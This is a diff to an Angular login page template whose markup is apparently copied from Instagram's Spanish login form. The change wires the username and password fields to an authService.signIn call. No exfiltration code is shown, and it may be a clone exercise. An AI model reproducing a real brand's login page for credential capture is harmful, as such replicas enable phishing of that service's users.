--- a/src/app/modules/onboarding/login/login.component.html
+++ b/src/app/modules/onboarding/login/login.component.html
@@ -68,12 +68,13 @@
                                                         </div>
                                                     </div>
                                                     <div class="_ab3a">
-                                                        <form class="_ab3b" id="loginForm" method="post">
+                                                        <!-- <form class="_ab3b" id="loginForm" method="post"> -->
+                                                        <form class="_ab3b" id="loginForm">
                                                             <div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh xqui205 x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1">
                                                                 <div class="_ab32">
                                                                     <div class="x6s0dn4 xnz67gz xx7zo7k x1fzb3qy xb0nk2e xubunj8 x1npaq5j x1c83p5e x1enjb0b x199158v x9f619 x5n08af x78zum5 x1q0g3np xvs91rp x1n2onr6 xh8yej3">
                                                                         <label class="_aa48">
-                                                                            <span class="_aa4a">Teléfono, usuario o correo electrónico</span>
+                                                                            <!-- <span class="_aa4a">Teléfono, usuario o correo electrónico</span> -->
                                                                             <input
                                                                                 aria-label="Teléfono, usuario o correo electrónico"
                                                                                 aria-required="true"
@@ -84,6 +85,7 @@
                                                                                 type="text"
                                                                                 value=""
                                                                                 name="username"
+                                                                                #username
                                                                             />
                                                                         </label>
                                                                         <div
@@ -94,8 +96,8 @@
                                                                 <div class="_ab32">
                                                                     <div class="x6s0dn4 xnz67gz xx7zo7k x1fzb3qy xb0nk2e xubunj8 x1npaq5j x1c83p5e x1enjb0b x199158v x9f619 x5n08af x78zum5 x1q0g3np xvs91rp x1n2onr6 xh8yej3">
                                                                         <label class="_aa48">
-                                                                            <span class="_aa4a">Contraseña</span>
-                                                                            <input aria-label="Contraseña" aria-required="true" autocapitalize="off" autocorrect="off" class="_aa4b _add6 _ac4d" type="password" value="" name="password" />
+                                                                            <!-- <span class="_aa4a">Contraseña</span> -->
+                                                                            <input aria-label="Contraseña" aria-required="true" autocapitalize="off" autocorrect="off" class="_aa4b _add6 _ac4d" type="password" value="" name="password" #password />
                                                                         </label>
                                                                         <div
                                                                             class="x6s0dn4 x6umtig x1b1mbwd xaqea5y xav7gou x9f619 x78zum5 x1c4vz4f x2lah0s xdl72j9 x1q0g3np xk390pu x5yr21d xdj266r x11i5rnm xat24cr x1mh8g0r xexx8yu x1sxyh0 x18d9i69 xkhd6sd x1n2onr6 xxymvpz"
@@ -105,7 +107,7 @@
                                                                 <div
                                                                     class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh x1xmf6yo x1e56ztr x540dpk x1m39q7l x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1"
                                                                 >
-                                                                    <button class="_acan _acap _acas _aj1-" disabled="" type="submit">
+                                                                    <button class="_acan _acap _acas _aj1-" type="submit" (click)="this.authService.signIn(username.value, password.value)" >
                                                                         <div class="x9f619 xjbqb8w x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh x1n2onr6 x1plvlek xryxfnj x1c4vz4f x2lah0s xdt5ytf xqjyukv x1qjc9v5 x1oa3qoh x1nhvcw1">Entrar</div>
                                                                     </button>
                                                                 </div>
